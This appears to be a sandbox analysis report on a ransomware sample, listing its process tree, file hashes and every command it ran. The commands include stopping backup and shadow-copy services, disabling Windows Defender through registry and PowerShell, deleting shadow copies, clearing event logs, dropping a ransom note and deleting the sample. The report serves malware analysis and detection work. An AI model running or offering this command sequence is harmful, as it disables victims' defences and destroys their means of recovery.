3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3376 wrote to memory of 2832 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 2832 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 2832 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 2832 wrote to memory of 4152 2832 net.exe net1.exe PID 2832 wrote to memory of 4152 2832 net.exe net1.exe PID 2832 wrote to memory of 4152 2832 net.exe net1.exe PID 3376 wrote to memory of 4036 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4036 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4036 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 4036 wrote to memory of 3080 4036 net.exe net1.exe PID 4036 wrote to memory of 3080 4036 net.exe net1.exe PID 4036 wrote to memory of 3080 4036 net.exe net1.exe PID 3376 wrote to memory of 3980 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 3980 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 3980 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3980 wrote to memory of 4196 3980 net.exe net1.exe PID 3980 wrote to memory of 4196 3980 net.exe net1.exe PID 3980 wrote to memory of 4196 3980 net.exe net1.exe PID 3376 wrote to memory of 4188 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4188 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4188 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 4188 wrote to memory of 4396 4188 net.exe net1.exe PID 4188 wrote to memory of 4396 4188 net.exe net1.exe PID 4188 wrote to memory of 4396 4188 net.exe net1.exe PID 3376 wrote to memory of 4384 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4384 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4384 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 4384 wrote to memory of 4436 4384 net.exe net1.exe PID 4384 wrote to memory of 4436 4384 net.exe net1.exe PID 4384 wrote to memory of 4436 4384 net.exe net1.exe PID 3376 wrote to memory of 4336 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4336 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4336 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 4336 wrote to memory of 3228 4336 net.exe net1.exe PID 4336 wrote to memory of 3228 4336 net.exe net1.exe PID 4336 wrote to memory of 3228 4336 net.exe net1.exe PID 3376 wrote to memory of 3784 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 3784 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 3784 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3784 wrote to memory of 4508 3784 net.exe net1.exe PID 3784 wrote to memory of 4508 3784 net.exe net1.exe PID 3784 wrote to memory of 4508 3784 net.exe net1.exe PID 3376 wrote to memory of 4512 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4512 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 4512 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 4512 wrote to memory of 452 4512 net.exe net1.exe PID 4512 wrote to memory of 452 4512 net.exe net1.exe PID 4512 wrote to memory of 452 4512 net.exe net1.exe PID 3376 wrote to memory of 612 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 612 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 3376 wrote to memory of 612 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe net.exe PID 612 wrote to memory of 840 612 net.exe net1.exe PID 612 wrote to memory of 840 612 net.exe net1.exe PID 612 wrote to memory of 840 612 net.exe net1.exe PID 3376 wrote to memory of 432 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 432 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 432 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1116 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1116 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1116 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1280 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1280 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1280 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe PID 3376 wrote to memory of 1508 3376 3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4152
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3080
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4196
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4396
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4436
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3228
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:4508
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:452
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_1643c" /y2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y3⤵PID:840
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:432
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1116
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1280
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1508
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1712
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1920
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2232
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2404
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_1643c" start= disabled2⤵PID:2648
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3008
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3812
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4520
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4784
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4888
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4664
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2896
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4916
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4564
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4600
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:4884
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:5024
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1100
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:2196
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:736
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4956
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4828
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:712
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1108
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1240
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2952
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1824
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1940
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2244
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2736 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3324 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4672 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:332
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2668
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3732
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3264
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4116 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3444
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3652 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4064 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3192 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4172 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3228
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4504 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4232
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3320 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2868 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\iotb_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:616 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"2⤵PID:4240
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2696
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
932fbbcec97a66cb6d8b534b3adcb522
SHA14b4e0903311f976910faf1ad20e79a1fd258d70e
SHA25615a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101
SHA5123e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5